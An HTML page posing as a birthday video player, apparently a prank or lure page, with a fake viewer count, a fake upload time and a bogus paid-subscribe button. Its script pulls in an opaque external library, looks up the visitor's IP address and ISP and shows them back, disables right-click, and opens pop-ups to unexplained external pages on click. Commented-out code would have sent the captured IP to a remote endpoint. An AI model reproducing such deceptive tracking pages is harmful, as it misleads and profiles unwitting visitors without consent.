<!DOCTYPE html>
<html>
<head>
<title>Harsha Birthday Special Intro...</title>
<meta name='viewport' content='width=device-width'>
<meta name="theme-color" content="#000000">
<script src='https://spat-cloud.github.io/HarScript/HSDK.Private.Raw.js'></script>
</head>
<style>/*Style*/
                *{
                    margin:0;
                    padding:0;
                    box-sizing:border-box;
                }
                body{
                    background-color:#342f2f;
                    
                }
                .hplayer{
                    max-width:fit-content;
                      /*  aspect-ratio:9/16;*/
                   margin:3% auto;
                   /* position: absolute; */
                   /* background-size: cover; */
                    /* border: 3px solid #a6959531; */
                    /* background-color: inherit; */
                    display: flex ;
                    flex-wrap: wrap ;
                    flex-direction: column ;
                    justify-content: center;
                    align-items: center ;
                    /*border:1px solid #ccc;*/
            }
            .Head{
                display: flex ;
                
                
                align-items: center ;
                justify-content: space-between;
                width:100%;
                height:30px;
                top:0;
                left:0;
                right:0;
                position: fixed;
                padding:.5em;
                opacity:0.9;
                /*border:1px solid #ef9292;*/
                background-color:#000;
            }
            .Head>a>img{
            width:50px;
            object-fit :cover ;
            }
            #Tr{
                width:calc(90px);
                height:calc(70px);
                padding:.3em;
                font-size:25px;
                top:5%;
                position: absolute;
                border-radius:.5em;
                font-weight: bold ;
                border:none;
                background-color:#d9381c;
                color:#fff;
                z-index :3 ;
               opacity:0.9;
                display:none;
            }
            #myPlay{

                max-width:100%;
                left: 0;
               aspect-ratio:16/9;
                top:3%;
                border-radius: 7px;
                box-shadow: 1px 3px 1px 1px #191414;

               /* position: relative; */
            }
           #pt{
                color:#fff;
                font-weight :bold ;
                font-size :25px ;
                
            }
          #vw,  #upt{
                color:#ddd;
                font-size: 17px ;
                
            }
            #vw::after{
                content:'.';
            }
            #sbs{
                color:#fff;
            }
            .Description {
                display: flex;
                flex-wrap: wrap;
                justify-content: flex-start;
                align-items :center ;
                gap:11px;
                width:100%;
                /* position: fixed; */
                margin-top:2%;
                height:max-content;
                border-radius:7px;
                padding:.3em;
                background-color:rgba(0,0,0,0.7);
                
            }
            #sbs{
                background-color:#ff0000;
                color:#fff;
                padding:.3em;
                font-weight:bold;
                border-radius:7px;
            }
            .ft{
                display :flex ;
                flex-direction :column ;
                justify-content : space-between ;
                align-items:center;
                width:100%;
                bottom:0;
                position: absolute;
                padding:.5em;
                background-color:#941932;
                color:#fff;
                text-align: center ;
            }
            .ft>a {
                color:#fff;
                text-decoration: none ;
                font-size:17px;
                text-align: center ;
            }
            #hd3{
                color:#fff;
                text-align: center ;
            }
            .hide{
                display: none;
            }
</style>
<body>
<div class="Head"><a href="JavaScript:fop()"><img src="Netliks.png" ></a>
    <span id="sbs" onclick="fop()">Subscribe &#x20b9; 599</span>
</div>
        <div class="hplayer" >
 <button id="Tr" >&#x27f3;</button>

                <video id="myPlay" poster="https://www.blog.motionisland.com/wp-content/uploads/2022/03/Loading_1.gif" width="100%" onerror="alert('UnsuckSexful')" >

                    <!-- <source src="">Error</source> -->
                               
                </video>
                <div class="Description" >
                    <span id="pt">HARSHA BIRTHDAY Special Out Now...</span>         
                    <span id="vw"><pre id="wat">%d</pre>watching</span>
                   <span id="upt"><pre id="vt">%s</pre>  ago</span>
                   <details style="color:#ddd;" onClick="getX()"> 
                   <summary>Video Description</summary>
                   It is a Brain Rot Video , Senstive People Better Don't See,Created by SonPanAbTej
                   </details>
  </div>
  
<!--<div class="Description">
                  <span id="pt">Load Loading...</span>          
</div>-->
        </div>
        <h3 id="hd3" >Trusted With <pre id="inp">%ip</pre> is protected</h3>
        <pre id="inpx" style="display:none;">%ip</pre>
<!-- <div class="Description">
                  <span id="pt">HARSHA BIRTHDAY Trailer Out Now...</span>         
                  <span id="vw">%hrs% watching</span>
                 <span id="upt">%hrs% ago</span>
</div> -->
<div class="ft">
<span>CONTACT US Instagram</span>
 <a href="https://www.instagram.com/sonpanabtej.harsha.memes" target="_blank"><img src="https://upload.wikimedia.org/wikipedia/commons/thumb/2/28/Instagram_logo.png/1024px-Instagram_logo.png" width="50px" style="aspect-ratio:1/1;mix-blend-mode: screen;"></a>
 <a href="#" ><img src="Netliks.png" width="100px" style=""></a>
 <span><i>Powered by sonpanabtej.</i></span>
</div>
</body>
<script type='text/javascript'>
        (function (){
           let  x=new $_;
           flo=Date.now();
tot=new Date("2025/04/12")-flo;
gt=Math.floor(tot/86400/1000);

            x.run();
            wat.innerText=Math.floor(Math.random() *49);
                        vt.innerText=gt>0?gt:"java.Execption.NaN";
          //  var ea=[];
            var vp=x.qs("#myPlay");
            setTimeout(()=>x.HAlert("Free Video is Playing Dismiss"),1500);
            window.addEventListener("contextmenu",(e)=>e.preventDefault());
        //  function fv(){
            var ms="HARSHA BIRTHDAY";
           // fetch(ms.lh()+'.mp4').then(bl=>bl.blob())
         //   .then(sd=>
         
     vp.onloadeddata=function(){loadLoading()};
     
     function loadLoading(){
         vp.play();
         
     }

           // document.addEventListener("DOMContentLoaded",function(){
           window.addEventListener("click",function(){
              
           vp.src=ms.lh()+'.mp4';
                       vid.volume=0.2;
            vp.autoplay=true;
           
            vp.load();

            setTimeout(
        window.open("//spat-cloud.github.io/3acXvnmm","blank"),1500);
            //    (inp.innerText!="%ip"&&inpx.innerText!="%ip")?x.chat(location.href,ea[0]+","+ea[1]):0;
            //.catch(console.log)
         //}
        
 },{once:true});
    vp.addEventListener("ended",function(){  Tr.style.display=this.ended?"block":"none";

});
vp.addEventListener("click", function(){
    window.open("//spat-cloud.github.io/bx3577av+","blank");
},{once:true})
        Tr.onclick=function(e){vp.currentTime=0;vp.play();this.style.display="none";};
// https://speed.cloudflare.com/meta
fetch("https://speed.cloudflare.com/meta").then(xyz=>xyz.json()).then(os=>{inp.textContent=os.asOrganization;inpx.textContent=os.clientIp})
//.then(op=>inp.innerText=ea[0];inpx.innerText=ea[1])
.catch(alert)
//https://www.instagram.com/reel/DIELsx8St6K/?igsh=NnBsenM0cnA2NnN0
    /*evt.org=;
    evt.cip=ky.clientIp
    x.chat(location.href,evt);*/
fop=()=>window.open("//spat-cloud.github.io/init_7","blank");
      })()
</script>
</html>
